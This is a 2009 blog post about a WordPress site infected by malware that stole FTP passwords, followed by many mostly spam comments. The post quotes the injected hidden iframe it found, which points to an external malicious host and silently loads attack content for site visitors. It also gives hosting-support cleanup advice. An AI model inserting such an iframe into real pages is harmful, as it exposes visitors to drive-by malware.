Completely Remove Malware from Your Computer – Malware / Worm that steals FTP login information

Posted on August 20, 2009 by admin57 Comments »

This week I got error on almost of my Wordpress blogs, this error occurred twice in the past 5 days. It really made me worried and giddy, because there’s just a blank page with error message like this:

Warning: Unexpected character in input: ''' (ASCII=39) state=1 in …. Parse error: syntax error, unexpected '.' in ….

After I checked my files, there’s code added at the bottom line of my files, iframe code like this:

<iframe src="http://c9u.at:8080/ts/in.cgi?pepsi147" width=125 height=125 style="visibility: hidden"></iframe>

This line tells me that I have been hacked, infected by virus / worm.

This is a malware / worm that steals my FTP login information from my FTP programs and modifies lots of php / html / htm pages on all of the sites it can access. In FTP log file, there’re lots of entries showing someone downloading the file and then re-uploading it again. It appears destructively to modify the files overwriting whatever text was there.

Here’s a list of some sources that I found according to this issue:

http://wordpress.org/support/topic/268083
http://wordpress.org/support/topic/272140
http://wordpress.org/support/topic/272379
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/

First time I face this virus, what I did is re-upload those infected files and rename my FTP password. I think I just resolved this problem and it will not happen again. But I was wrong, today I get this error again.

So I really know now, I need to take serious action to completely remove the worm / malware. I have to ensure my computer completely clean and it doesn’t happen again.

Referring to the Hostgator Security Support, in order to protect against future attack, I need to run full virus and malware scans on my computer to ensure that they are clean.

Hello,

It appears that malicious code has been uploaded to your account via FTP using a compromised username and password. At this time, I have removed the malicious code from the account.

From our experience with malware of this nature, the user account passwords are compromised though viruses/malware located on your local computer. This malware sniffs out passwords used and stored by FTP programs located on the computer. In order to protect against future attack, you will need to run full virus and malware scans on your computers to ensure that they are clean. I recommend using multiple scanners as we have found that some scanners do not detect the malware. MalwareBytes ( http://www.malwarebytes.org/ ) and ComboFix ( http://www.bleepingcomputer.com/combofix/how-to-use-combofix ) have been reported to be able to clean this malware. It is highly suggested that you also do the following:

* Any computers legitimately allowed to access the account must be updated fully (Windows updates, browser updates, application updates, anti-virus updates)

* Any computers legitimately allowed to access the account must be completely scanned for viruses and secured completely

Despite now I’m not sure that my computer completely clean, but I just have been doing some action to protect my computer:

Update my FTP password
Update my FPT software to the newest version
Of course, re-upload infected files dan upgrade my Wordpress blog to the latest version
Scan my whole computer using Malware Bytes from www.malwarebytes.org

Only that I can do now, I hope this error doesn’t happen again and the worm is completely removed.

Posted in Ramblings, Wordpress |

Realted Articles:

If you enjoy here and like what you read, please subscribe to my blog feed or sign up for email updates, see the form at the right top. Find out what I am doing right now and the most update from me, please follow me on Twitter!. Thanks for visiting!

57 Responses to “Completely Remove Malware from Your Computer – Malware / Worm that steals FTP login information”

on 23 Aug 2009 at 4:03 pmzalds

that’s why we need to always have an updated anti-malware, anti-spyware.. and antivirus in our PC.

I just changed my loginn info too.. napa-paranoid na yata ako..
on 25 Aug 2009 at 12:39 amIyanna@WoW Gold Guide Review

Upgrade every now and then. Passwords should also be changed to prevent from all these FTP hacks.
on 26 Aug 2009 at 10:43 amSelboy

my pc is installed with deepfreeze and AVG. And don’t have problems with malwares.
on 11 Sep 2009 at 3:23 pmRemove Http Referrer

Based, demand service, it does not need to be installed on every computer. Remove Http Referrer
on 08 Nov 2009 at 11:25 amCloak Link

Malware or malicious software is software designed to infiltrate or damage a computer system without the owner’s informed consent. Cloak Link
on 10 Nov 2009 at 1:30 pmprofession of photography

After losing a computer to damage caused by viruses and malware, I can’t stop worrying about the security of my other PCs. I recently set up a brand new machine and I would really appreciate some advice on what firewall to install and what antivirus to use.
on 24 Nov 2009 at 4:56 pmBali Accommodation

How did you removed this Malware? If i am using AVG9 is it possible to remove malware like this?
on 11 Dec 2009 at 4:35 pmpersonalised gifts

In market their are enormous number of antivirus treatment solution.
on 14 Dec 2009 at 1:28 amEssays

Thanks for the code man… I think many blog owners looking for this kinda codes.
on 20 Jan 2010 at 8:26 pmEid Gifts to Pakistan

There are many Anti-malware and Anti-spyware in the market but they does not remove it properly. I think this Code will help a lot thank you for sharing this Post.
on 21 Jan 2010 at 1:23 amGold Price per Ounce

Thanks for information.This information very important
on 25 Jan 2010 at 11:19 amGifts to Pakistan

I recently set up a brand new machine and I would really appreciate some advice on what firewall to install and what anti virus to use.But sometime the operating system also enhance the matter of the fact as it is considered.
on 01 Feb 2010 at 3:32 pmpromotional items

I purchased a domain name and a hosting plan from godaddy.com. I am using a WYSIWYG program called NVU to build my site. It asks for the Publishing Address, which is the FTP server info that I get from my web hosting service.
on 04 Feb 2010 at 4:53 pmNaija Computers

I once suffered this kind of hack. It allowed the hacker to post url’s right inside my post. I didn’t notice it on time. When I eventually discovered it, it took a lot of work to get the posts re-written and the malicious urls removed. I’m going to run a malware test on my computer right away.
Naija Computers´s last blog ..Which Is The Best AntiVirus?
on 04 Feb 2010 at 4:59 pmSmall Business

It can be really nauseating getting hacked. It is better to take necessary steps to prevent a hack especially as your website content get’s voluminous. Else, the clean-up process can really be tasking.
Small Business´s last blog ..Online Business
on 11 Feb 2010 at 2:20 pmLuxury Property Rental in Umbria Italya, Italy

THAN YOU THIS POST IS VERY IMPPARTANT
on 12 Feb 2010 at 5:35 pmGifts to Pakistan

Anti-spyware in the market but they does not remove it properly. I think this Code will help a lot thank you for sharing this Post.
on 12 Feb 2010 at 9:15 pmCheap car rental

I do not have and cannot get the login information from the person who set it up. How can I… Get the login information from your friend, or from the third party who has the information…
Cheap car rental´s last blog ..
on 13 Feb 2010 at 3:00 ammonalisa22244

How to remove Malware:Trojan, Virus, Worm, spyware, adware or other Malware

http://www.tips29.com/2009/01/how-to-remove-common-malwaretrojan.html
on 15 Feb 2010 at 5:52 pmQigong

I want switch to ubuntu linux but I can not seem to find a clients password, so I can not switch unless I can I be sure that I will beable to webmaster for her in the future.
on 17 Feb 2010 at 3:49 pmHajj Umrah

One wishes there were some permanent solution to these viruses. A malware can really bring the computer crashing into oblivion.
on 18 Feb 2010 at 11:17 amGifts to Pakistan

Great deed and effort need to bush up recognized after all to have the best things.
on 18 Feb 2010 at 11:17 amGifts to Pakistan

Get the login information from your friend, or from the third party who has the information…
on 18 Feb 2010 at 5:40 pmWeb Design Company

Once you change your password often enough and upgrade on a regular basis, some of these FTP hacking can be obviated.
on 01 Mar 2010 at 9:15 pmGucci Sneakers

I can not switch unless I can I be sure that I will beadle to webmaster for her in the future.
on 01 Mar 2010 at 9:16 pmGucci Sneakers

I would really appreciate some advice on what firewall to install and what anti virus to use.But sometime the operating system also enhance the matter of the fact as it is considered.
on 03 Mar 2010 at 3:06 pmCheap car rental

How would i access the server, and what do i put in the FTP host box, Host Directory box, login and password. Also, do i check any of the boxes below? And where would i find any of this information?
Cheap car rental´s last blog ..
on 03 Mar 2010 at 4:32 pmQigong

What are FTP programs that support uploads via url Not mere browsing existing files on the HD?
Qigong´s last blog ..
on 12 Mar 2010 at 7:40 pmGreen Building Certification Wilmington NC

These malwares can create havoc. A good anti-virus is tthe only security against it.
on 16 Mar 2010 at 7:24 pmQigong

One question that a lot of people have is what is malware and if infected, how do I remove malware? Basically, malware stands for malicious software and consists of numerous kinds of dangerous computer infections like virus, worm, Trojan, adware and spyware.
on 19 Mar 2010 at 2:13 amMarkRight

Cool blog as for me. I’d like to read a bit more about that topic. Thank you for sharing this material.
on 23 Mar 2010 at 1:19 amSelf catering Cottages UK

Ignoring the evils of these malware can crash your computer at any time possible.
on 24 Mar 2010 at 1:59 pmCompound Pharmacy

Thanks a lot for the article. I really love to read such articles for you share different body of knowledge that people should know. I admire writers like you on providing great post that you dedicate your time in doing so. Thanks again and keep up the great work!
on 24 Mar 2010 at 11:11 pmWaste Management Company UK

A good security software is the only shield against these malwares.
on 29 Mar 2010 at 12:35 pmOffshore Company Formation

These malwares are on the internet and they travel via search engines. Should not search engines have some filter themselves to restrict its movements?
on 01 Apr 2010 at 4:06 pmQigong

Viruses on computer malware/trojan?
My computer is being attacked by all these viruses, it seems like out of nowhere. A pop up said these viruses came from visiting porn sites and torrent sites, well I’ve went to one torrent site piratebay a couple months ago but why is it doing all of this? this thing is trying to get into my passwords for my paypal, bank account and other stuff and when I try to remove these infections it say I have to purchase the full version well right now and I need this gone, what do I do??
Qigong´s last blog ..Physical therapy equipments
on 02 Apr 2010 at 9:13 amGasoline

Thanks for the great reading, we will follow your blog. Gasoline blog.
Gasoline´s last blog ..Bloomberg Features the Oil Politics
on 06 Apr 2010 at 4:19 pmWeight Loss Program

How do I completely remove my myspace playlist?
I try deleting all the songs from my playlist so I don’t have to have one anymore, but the stupid thing says I have to have at least ONE song. How do I remove it?
Weight Loss Program´s last blog ..Weight Loss Diet
on 09 Apr 2010 at 12:30 pmWeight Loss Program

How do i remove malware from my computer?
Weight Loss Program´s last blog ..Weight Loss Diet
on 10 Apr 2010 at 2:26 pmWeight Loss Program

How do i completely remove the shortcut symbol from an icon?
Weight Loss Program´s last blog ..Weight Loss Diet
on 19 Apr 2010 at 8:57 pmPersonal Finance

Is it possible to get rid of the symbol to a shortcut in the icons?
on 21 Apr 2010 at 1:56 pmGasoline

Thanks for great information it’s a wonderful. Your site is very useful for me .I bookmarked your site!
Gasoline´s last blog ..Taxi Cab that Uses Natural Gas
on 22 Apr 2010 at 12:12 pmPlastic Cards

Your post has proved invaluable in our own understanding and analysis of the issue.
on 24 Apr 2010 at 12:44 pmStock Brokers India

Thats an insightful post. Incisive and cogent.
on 27 Apr 2010 at 8:38 amCollege Dating

Thanks for great information it’s a wonderful. Your site is very useful for me .I bookmarked your site!
College Dating´s last blog ..Taxi Cab that Uses Natural Gas
on 03 May 2010 at 10:46 amCheap Mbt Shoes

very good information you write it very clean. I’m very lucky to get

this info from you.
on 20 May 2010 at 3:48 pmpromotional items

psolution is to use suPHP on the server to manage the ownerships properly so wordpress and ftp work as they should, just a much easier situation for most
people out there.
on 26 May 2010 at 4:33 pmKristyBurke27

Houses are quite expensive and not everyone is able to buy it. However, business loans are created to help people in such situations.
on 31 May 2010 at 8:52 pmwordpress tutorials

i had windows updated turned off , just put it back on , thanks for the tips
wordpress tutorials´s last blog ..Get Traffic to your new blog
on 03 Jun 2010 at 10:16 amboats for sale au

Unfortunately, removing Personal Antivirus through the Add/Remove Programs or by deleting its files does not always ensure the right effect. Sometimes, it may take a professional automatic removal tool to get rid of this malicious program. You can follow our automatic removal recommendations provided in our post.
on 06 Jun 2010 at 12:35 amGifts to Pakistan

Thanks for your ideas. I have installed symentec on my pc and i update it on regular basis. With it i don’t have any pc threat.
on 06 Jul 2010 at 10:56 pmWeight Loss Program

Hi FTP is a file transfer protocol that is managed by server all is very nice work and also critical all is lovely sharing i love this post because all is my work experience.
Weight Loss Program´s last blog ..Weight Loss Diet
on 08 Jul 2010 at 11:51 pmGifts to Pakistan

Really very informative post this one. I admire those writers who share the best of their knowledge in writing such articles. Keep up the good work and continue inspiring readers.Thank you so much.
on 11 Jul 2010 at 9:53 amMetro Ethernet

Definitely quite informative post this one particular. I admire individuals writers who share the best of their know-how in writing such content articles. Retain up the excellent operate and carry on inspiring readers.
Metro Ethernet´s last blog ..Please visit Yourphoneshaqcom
on 11 Jul 2010 at 10:00 amMetro Ethernet

Your post has proved invaluable in our personal understanding and analysis with the concern.
Metro Ethernet´s last blog ..Please visit Yourphoneshaqcom
on 13 Jul 2010 at 4:03 pmExcel Tutorials

Hi very great title sharing telling about Completely Remove Malware from Your Computer Malware Worm that steals FTP login information.
on 22 Jul 2010 at 5:30 pmFinancial Planning

Hey nice article. Thanks for the information, Maleware has always been a challenge to handle, as many times they attack the FTP information. Your information is very viable.
Financial Planning´s last blog ..Reliance Growth Fund

Trackback URI | Comments RSS

I'll give more attention in topic about: make money online and or about how to monetize web/blog. Make money online could be interesting topic in this blog.

And it can be more extensive, not only about blog and blogging, and make money online, but including all internet and computer related information such as software, computer, website, design, seo, webmaster, and much more. Read More...